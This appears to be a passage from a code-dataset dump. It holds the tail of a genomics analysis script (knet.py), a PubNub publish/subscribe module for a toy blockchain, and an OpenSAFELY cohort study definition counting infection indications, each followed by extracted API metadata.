'../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n# Knet main as case control one hot \nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '0.2' , '--hidAct' , '2' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n \n \n \n # load / save weights \nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10' , '--loadWeights', '../../../0cluster/results/knettest/chr22']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n \n \n# h2 analysis:\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/h2/chr1','h2', '--bfile','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n# same as above but loading eigsum\nargs = parser.parse_args(['--out', '../../../0cluster/results/knettest/h2/chr1','h2', '--eig','../../../0cluster/results/knettest/h2/chr1', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n \n \n# Ridge BLUP\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/bluptest','rrblup', '--bfile','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid', '--delta', '20.0'])\n \n \n#Kinship\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/kinship','kinship', '--bfile','../../../0cluster/data/knettest/22_toy_long_train', '--weights', '../../../0cluster/data/knettest/weights.short', '--MAFS', '-0.25', '--dominance' , '1']) \n \n \n \n#Kinship merge\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/kinship_merged','kinmerge', '--allkins','../../../0cluster/results/broadsenseh2/kinlist.txt']) \n \n\n# Multi HE\nargs = parser.parse_args(['--out', '../../../0cluster/results/broadsenseh2/heh2','mhe', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--addkin','../../../0cluster/results/broadsenseh2/kinship_add', '--domkin','../../../0cluster/results/broadsenseh2/kinship_dom', '--epi','2', '--res', '1']) \n \n\n# GCTA kinship\nargs = parser.parse_args(['--out', '../../../0cluster/results/gcta/knetver','h2', '--bfile','../../../0cluster/results/gcta/wtccc2_hg19_toy', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno']) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n\n# recode to Dominance\nargs = parser.parse_args(['--out', '../../../0cluster/results/gcta/knetdom','redom', '--bfile','../../../0cluster/results/gcta/wtccc2_hg19_toy']) \n\n \n\n# Knet AMBLUP regions\nargs = parser.parse_args(['--out', '../../../0cluster/results/knet_amblup/kamblup','knet', '--knet','../../../0cluster/data/data/toy/wtccc2_hg19_toy', '--pheno', '../../../0cluster/data/data/toy/wtccc2_hg19_toy.pheno', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/data/toy/wtccc2_hg19_toy' ,'--validPhen', '../../../0cluster/data/data/toy/wtccc2_hg19_toy.pheno', '--evalFreq', '10', '--recodecc' , '1' , '--hidCount' , '5' , '--hidl2' , '0.2' , '--hidAct' , '2' , '--amblupreml' , '../../../0cluster/data/data/toy/amblup_1.reml' , '--amblupregions' , '../../../0cluster/data/data/toy/chunks_amb1/' , '--conv' , '0' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'\n\n\n \n# \n# --saveWeights\n# --savFreq\n\n\n \n \n \n \n", "sub_path": "knet/knet.py", "file_name": "knet.py", "file_ext": "py", "file_size_in_byte": 42688, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 51, "usage_type": "attribute"}, {"api_name": "resource.RLIMIT_AS", "line_number": 59, "usage_type": "attribute"}, {"api_name": "resource.getrlimit", "line_number": 60, "usage_type": "call"}, {"api_name": "resource.setrlimit", "line_number": 64, "usage_type": "call"}, {"api_name": "resource.getrlimit", "line_number": 66, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 79, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 79, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 81, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship.recodeSNPs_to_Dominance", "line_number": 84, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 84, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writePLINK", "line_number": 87, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 87, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 90, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 91, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 109, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 109, "usage_type": "name"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 110, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 110, "usage_type": "name"}, {"api_name": "com.application.logic.he.multi_he.HE_Multi_external", "line_number": 117, "usage_type": "call"}, {"api_name": "com.application.logic.he.multi_he", "line_number": 117, "usage_type": "name"}, {"api_name": "com.application.logic.he.multi_he.HE_Multi_residuals", "line_number": 118, "usage_type": "call"}, {"api_name": "com.application.logic.he.multi_he", "line_number": 118, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadKinshipLocations", "line_number": 135, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 135, "usage_type": "name"}, {"api_name": "com.io.knet_IO.load_N_fromGCTA_GRM", "line_number": 140, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 140, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 143, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadGCTA_GRM", "line_number": 149, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 149, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 154, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 161, "usage_type": "call"}, {"api_name": "com.io.knet_IO.writeGCTA_GRM", "line_number": 164, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 164, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 177, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 177, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 181, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 184, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 184, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 189, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.computeMAFScore", "line_number": 196, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 196, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadLDAKWeights", "line_number": 199, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 199, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.take", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.take", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 214, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship.calc_Kinship_Dominance", "line_number": 222, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 222, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 223, "usage_type": "call"}, {"api_name": "com.io.knet_IO.writeGCTA_GRM", "line_number": 225, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 225, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 226, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 231, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 231, "usage_type": "name"}, {"api_name": "com.application.logic.reml.kinship.calc_Kinship", "line_number": 232, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 232, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeGCTA_GRM", "line_number": 233, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 233, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 284, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 284, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 286, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 286, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 289, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 291, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 291, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 295, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 296, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 296, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 297, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.computeBLUPs_RidgeBLUP", "line_number": 300, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 300, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 302, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 307, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 307, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 309, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.removeList", "line_number": 310, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 310, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 312, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 313, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 313, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 314, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.getSizeInMBs", "line_number": 315, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 315, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.predictYhat", "line_number": 320, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 320, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 349, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 349, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 350, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 350, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 353, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 354, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 354, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 358, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 359, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 359, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 360, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.computeBLUPs_RidgeBLUP_morep", "line_number": 363, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 363, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.backCalculate_Beta_BLUP", "line_number": 364, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 364, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 365, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 370, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 370, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 372, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.removeList", "line_number": 373, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 373, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 375, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 376, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 376, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 377, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.getSizeInMBs", "line_number": 378, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 378, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 397, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.predictYhat", "line_number": 403, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 403, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 433, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 433, "usage_type": "name"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 434, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 434, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 438, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 438, "usage_type": "name"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 441, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 441, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 443, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 444, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 444, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 445, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship.calc_Kinship", "line_number": 446, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 446, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 447, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.REML_GWAS", "line_number": 448, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 448, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 449, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadGCTA_GRM", "line_number": 453, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 453, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 455, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.REML_GWAS", "line_number": 457, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 457, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadEigenSum", "line_number": 461, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 461, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.REML_GWAS", "line_number": 462, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 462, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.h2_SE_approx2", "line_number": 468, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 468, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeEigenSum", "line_number": 481, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 481, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadRegionData", "line_number": 493, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 493, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadLDAKRegionsDeltas", "line_number": 498, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 498, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadLDAKRegions", "line_number": 499, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 499, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadSummaryStats", "line_number": 504, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 504, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 519, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadMatrixFromDisk", "line_number": 525, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 525, "usage_type": "name"}, {"api_name": "com.application.logic.knet.knet_manager.runKnet", "line_number": 533, "usage_type": "call"}, {"api_name": "com.application.logic.knet.knet_manager", "line_number": 533, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 534, "usage_type": "call"}, {"api_name": "com.application.utils.plotgen.exportNNPlot", "line_number": 557, "usage_type": "call"}, {"api_name": "com.application.utils.plotgen", "line_number": 557, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeMatrixToDisk", "line_number": 600, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 600, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 624, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 624, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 626, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 626, "usage_type": "name"}, {"api_name": "com.application.logic.scanner.scanner.findRegions", "line_number": 629, "usage_type": "call"}, {"api_name": "com.application.logic.scanner.scanner", "line_number": 629, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeRegionData", "line_number": 637, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 637, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 665, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadRegionData", "line_number": 668, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 668, "usage_type": "name"}, {"api_name": "com.application.logic.scanner.scanner.concatRegions", "line_number": 673, "usage_type": "call"}, {"api_name": "com.application.logic.scanner.scanner", "line_number": 673, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeRegionData", "line_number": 676, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 676, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 683, "usage_type": "call"}]} +{"seq_id": "232854306", "text": "'''PubNub file'''\nimport os\nimport time\n\nfrom pubnub.callbacks import SubscribeCallback\nfrom pubnub.pnconfiguration import PNConfiguration\nfrom pubnub.pubnub import PubNub\nfrom python_settings import settings\n\nfrom backend.blockchain.block import Block\n\nos.environ[\"SETTINGS_MODULE\"] = 'settings'\n\npnconfig = PNConfiguration()\npnconfig.subscribe_key = settings.SUBSCRIBE_KEY\npnconfig.publish_key = settings.PUBLISH_KEY\npubnub = PubNub(pnconfig)\n\nCHANNELS = {\n \"TEST\": \"TEST\",\n \"BLOCK\": \"BLOCK\"\n}\n\n\nclass Listener(SubscribeCallback):\n \"\"\"Listener class\"\"\"\n def __init__(self, blockchain):\n \"\"\"Initialize\"\"\"\n self.blockchain = blockchain\n\n def message(self, pubnub, message_object):\n \"\"\"Message\"\"\"\n print(\"\\n Channel: {} | Message: {}\".format(message_object.channel, message_object.message)) # noqa: E501\n\n if message_object.channel == CHANNELS[\"BLOCK\"]:\n block = Block.from_json(message_object.message)\n potential_chain = self.blockchain.chain[:]\n potential_chain.append(block)\n\n try:\n self.blockchain.replace_chain(potential_chain)\n print(\"\\n -- Successfully replaced local chain\")\n except Exception as error: # pylint: disable=broad-except\n print(\"\\n -- Did not replace a chain : {}\".format(error))\n\n\nclass PubSub():\n \"\"\"\n Handles the publish/subscribe layer of the application.\n Provides communication between the nodes of the blockchain network.\n \"\"\"\n\n def __init__(self, blockchain):\n \"\"\"Init\"\"\"\n self.pubnub = PubNub(pnconfig)\n self.pubnub.subscribe().channels(CHANNELS.values()).execute()\n self.pubnub.add_listener(Listener(blockchain))\n\n def publish(self, channel, message):\n \"\"\"Publish the message object to the channel.\"\"\"\n self.pubnub.publish().channel(channel).message(message).sync()\n\n def broadcast_block(self, block):\n \"\"\"Broadcast a block object to all nodes.\"\"\"\n self.publish(CHANNELS[\"BLOCK\"], block.to_json())\n\n\ndef main():\n \"\"\"Main\"\"\"\n pubsub = PubSub()\n\n time.sleep(1)\n pubsub.publish(CHANNELS[\"TEST\"], {\"foo\": \"bar\"})\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "backend/pubsub.py", "file_name": "pubsub.py", "file_ext": "py", "file_size_in_byte": 2220, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pubnub.pnconfiguration.PNConfiguration", "line_number": 14, "usage_type": "call"}, {"api_name": "python_settings.settings.SUBSCRIBE_KEY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "python_settings.settings", "line_number": 15, "usage_type": "name"}, {"api_name": "python_settings.settings.PUBLISH_KEY", "line_number": 16, "usage_type": "attribute"}, {"api_name": "python_settings.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "pubnub.callbacks", "line_number": 17, "usage_type": "name"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 17, "usage_type": "call"}, {"api_name": "pubnub.callbacks.SubscribeCallback", "line_number": 25, "usage_type": "name"}, {"api_name": "backend.blockchain.block.Block.from_json", "line_number": 36, "usage_type": "call"}, {"api_name": "backend.blockchain.block.Block", "line_number": 36, "usage_type": "name"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "348045179", "text": "######################################\n\n# This script provides the formal specification of the study data that will be extracted from\n# the OpenSAFELY database.\n# 17 Mar 2022 updated: infection history refer to first date of infection instead of index date\n\n######################################\n\n# --- IMPORT STATEMENTS ---\n\n## Import code building blocks from cohort extractor package\nfrom cohortextractor import (\n StudyDefinition,\n patients,\n #codelist_from_csv,\n codelist,\n filter_codes_by_category,\n #combine_codelists,\n Measure\n)\n\n## Import codelists from codelist.py (which pulls them from the codelist folder)\n\nfrom codelists import *\n\n\n#from codelists import antibacterials_codes, broad_spectrum_antibiotics_codes, uti_codes, lrti_codes, ethnicity_codes, bmi_codes, any_primary_care_code, clear_smoking_codes, unclear_smoking_codes, flu_med_codes, flu_clinical_given_codes, flu_clinical_not_given_codes, covrx_code, hospitalisation_infection_related #, any_lrti_urti_uti_hospitalisation_codes#, flu_vaccine_codes\n\n# DEFINE STUDY POPULATION ---\n\n## Define study time variables\nfrom datetime import datetime\n\nstart_date = \"2019-01-01\"\nend_date = datetime.today().strftime('%Y-%m-%d')\n\n## Define study population and variables\nstudy = StudyDefinition(\n\n # Configure the expectations framework\n default_expectations={\n \"date\": {\"earliest\": start_date, \"latest\": end_date},\n \"rate\": \"uniform\",\n \"incidence\": 0.1,\n },\n # Set index date to start date\n index_date=start_date,\n # Define the study population\n population=patients.satisfying(\n \"\"\"\n NOT has_died\n AND\n registered\n AND\n age\n AND\n has_follow_up_previous_year\n AND\n (sex = \"M\" OR sex = \"F\")\n \"\"\",\n\n has_died=patients.died_from_any_cause(\n on_or_before=\"index_date\",\n returning=\"binary_flag\",\n ),\n\n registered=patients.satisfying(\n \"registered_at_start\",\n registered_at_start=patients.registered_as_of(\"index_date\"),\n ),\n\n has_follow_up_previous_year=patients.registered_with_one_practice_between(\n start_date=\"index_date - 1 year\",\n end_date=\"index_date\",\n return_expectations={\"incidence\": 0.95},\n ),\n\n ),\n\n ########## patient demographics to group_by for measures:\n ### Age\n age=patients.age_as_of(\n \"index_date\",\n return_expectations={\n \"rate\": \"universal\",\n \"int\": {\"distribution\": \"population_ages\"},\n \"incidence\": 0.001\n },\n ),\n\n ### Age categories\n\n ## 0-4; 5-14; 15-24; 25-34; 35-44; 45-54; 55-64; 65-74; 75+\n age_cat=patients.categorised_as(\n {\n \"0\":\"DEFAULT\",\n \"0-4\": \"\"\" age >= 0 AND age < 5\"\"\",\n \"5-14\": \"\"\" age >= 5 AND age < 15\"\"\",\n \"15-24\": \"\"\" age >= 15 AND age < 25\"\"\",\n \"25-34\": \"\"\" age >= 25 AND age < 35\"\"\",\n \"35-44\": \"\"\" age >= 35 AND age < 45\"\"\",\n \"45-54\": \"\"\" age >= 45 AND age < 55\"\"\",\n \"55-64\": \"\"\" age >= 55 AND age < 65\"\"\",\n \"65-74\": \"\"\" age >= 65 AND age < 75\"\"\",\n \"75+\": \"\"\" age >= 75 AND age < 120\"\"\",\n },\n return_expectations={\n \"rate\": \"universal\",\n \"category\": {\n \"ratios\": {\n \"0\": 0,\n \"0-4\": 0.12, \n \"5-14\": 0.11,\n \"15-24\": 0.11,\n \"25-34\": 0.11,\n \"35-44\": 0.11,\n \"45-54\": 0.11,\n \"55-64\": 0.11,\n \"65-74\": 0.11,\n \"75+\": 0.11,\n }\n },\n },\n ),\n\n \n ### Sex\n sex=patients.sex(\n return_expectations={\n \"rate\": \"universal\",\n \"category\": {\"ratios\": {\"M\": 0.49, \"F\": 0.51}},\n }\n ),\n\n\n ### Practice\n practice=patients.registered_practice_as_of(\n \"index_date\",\n returning=\"pseudo_id\",\n return_expectations={\"int\": {\"distribution\": \"normal\",\n \"mean\": 25, \"stddev\": 5}, \"incidence\": 1}\n ),\n\n\n\n #find patient's first infection date \n indic_date_1=patients.with_these_clinical_events(\n all_indication_codes,\n returning='date',\n between=[\"index_date\", \"last_day_of_month(index_date)\"],\n find_first_match_in_period=True,\n date_format=\"YYYY-MM-DD\", \n return_expectations={\"date\": {\"index_date\": \"last_day_of_month(index_date)\"}},\n ),\n\n # AB_date_1=patients.with_these_medications(\n # antibacterials_codes_brit,\n # returning='date',\n # between=[\"index_date\", \"last_day_of_month(index_date)\"],\n # find_first_match_in_period=True,\n # date_format=\"YYYY-MM-DD\", \n # ),\n\n ########## any infection or any AB records in prior 90days (incident/prevelent prescribing)#############\n ## 0=incident case / 1=prevelent\n hx_indications=patients.with_these_clinical_events(\n all_indication_codes,\n returning=\"binary_flag\",\n between=[\"indic_date_1 - 90 days\", \"indic_date_1 - 1 day\"],\n find_first_match_in_period=True,\n return_expectations={\"incidence\": 0.1, \"date\": {\"earliest\": \"first_day_of_month(index_date) - 42 days\"}}\n ),\n \n # hx_antibiotics= patients.with_these_medications(\n # antibacterials_codes_brit,\n # between=[\"AB_date_1 - 90 days\", \"AB_date_1 - 1 day\"],\n # returning='binary_flag',\n # return_expectations={\"incidence\": 0.1, \"date\": {\"earliest\": start_date}},\n # ),\n\n \n ########## number of infection cousultations #############\n \n ## count infection events \n indication_counts=patients.with_these_clinical_events(\n all_indication_codes,\n returning=\"number_of_matches_in_period\",\n between=[\"indic_date_1\", \"last_day_of_month(index_date)\"],\n return_expectations={\n \"int\" : {\"distribution\": \"normal\", \"mean\": 5, \"stddev\": 1},\"incidence\":0.2}\n ),\n\n ## all antibacterials from BRIT (dmd codes)\n # antibacterial_brit=patients.with_these_medications(\n # antibacterials_codes_brit,\n # between=[\"AB_date_1\", \"last_day_of_month(index_date)\"],\n # returning=\"number_of_matches_in_period\",\n # return_expectations={\n # \"int\": {\"distribution\": \"normal\", \"mean\": 3, \"stddev\": 1},\n # \"incidence\": 1,\n # },\n # ),\n\n\n\n)\n\n# --- DEFINE MEASURES ---\n\n\nmeasures = [\n\n\n Measure(id=\"indication_counts\",\n numerator=\"indication_counts\",\n denominator=\"population\",\n group_by=[\"practice\", \"hx_indications\", \"age_cat\"]\n ),\n\n # Measure(id=\"ab_count_all\",\n # numerator=\"antibacterial_brit\",\n # denominator=\"population\",\n # group_by=[\"practice\", \"hx_antibiotics\", \"age_cat\"]\n # ),\n\n\n]\n", "sub_path": "analysis/study_definition_indication.py", "file_name": "study_definition_indication.py", "file_ext": "py", "file_size_in_byte": 6962, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.today", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "name"}, {"api_name": "cohortextractor.StudyDefinition", "line_number": 38, "usage_type": "call"}, {"api_name": "cohortextractor.patients.satisfying", "line_number": 49, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 49, "usage_type": "name"}, {"api_name": 